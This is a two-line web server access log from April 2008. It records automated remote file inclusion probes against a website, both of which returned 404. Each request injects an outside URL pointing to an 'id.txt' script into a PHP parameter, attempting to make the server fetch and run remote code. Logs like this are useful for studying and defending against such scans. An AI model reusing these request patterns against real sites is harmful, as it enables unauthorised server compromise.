82.103.72.218 - - [01/Apr/2008:02:24:29 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://82.103.72.218/administrator/components/com_db/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.bsfadvisors.com"
205.234.242.100 - - [01/Apr/2008:02:25:22 -0700] "GET /logs/index.php?body=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
